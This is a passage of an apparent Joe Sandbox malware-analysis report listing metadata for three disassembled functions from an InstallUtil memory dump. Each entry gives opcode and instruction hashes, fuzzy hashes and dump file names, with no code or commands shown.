                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9658232e2ff0e225aab8999aa0a18828ff5c497b158fccaeaec32ab1ec0f036a
                                                                                                            • Instruction ID: cd0990f5f0b941f64c469c305e680130d73b219ed4302b5859367a8759e74739
                                                                                                            • Opcode Fuzzy Hash: 9658232e2ff0e225aab8999aa0a18828ff5c497b158fccaeaec32ab1ec0f036a
                                                                                                            • Instruction Fuzzy Hash: 0401F731B441024FDBA1E678E45171ABFE1EF85720F24892DE18AC73D5FA28DC02C351
                                                                                                            Function 060872CF Relevance: .0, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.4717214875.0000000006080000.00000040.00000800.00020000.00000000.sdmp, Offset: 06080000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_6080000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 125d3dad18ff85b0d5d788f38d3de50a4b2a72fd7414d11b0a46d0ff5713a2e6
                                                                                                            • Instruction ID: 253b4dda08502a6bb2b7b80d3d98bdea4f6862e922134c7c5517db7ecaa331a7
                                                                                                            • Opcode Fuzzy Hash: 125d3dad18ff85b0d5d788f38d3de50a4b2a72fd7414d11b0a46d0ff5713a2e6
                                                                                                            • Instruction Fuzzy Hash: E701A232B110194FDF95E6B8DC146EE76EB9BC9610F14853AD90AE7284EF64CC0187D2
                                                                                                            Function 0608DA40 Relevance: .0, Instructions: 46COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.4717214875.0000000006080000.00000040.00000800.00020000.00000000.sdmp, Offset: 06080000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_6080000_InstallUtil.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b4ba935fde144f9c7c928c41d38aeda3e7342e4d5c82fddf6bc228eb9db23e80
                                                                                                            • Instruction ID: 7342f7bc6d7334c07a4b6f4bd01978c6bfcd3d1cb8ab4a3f87e67f45aad4c931
                                                                                                            • Opcode Fuzzy Hash: b4ba935fde144f9c7c928c41d38aeda3e7342e4d5c82fddf6bc228eb9db23e80
                                                                                                            • Instruction Fuzzy Hash: 1401A431B500154FDBA0E67CE450B2A77DAEB89720F248929E54AC73C4FE25DC018395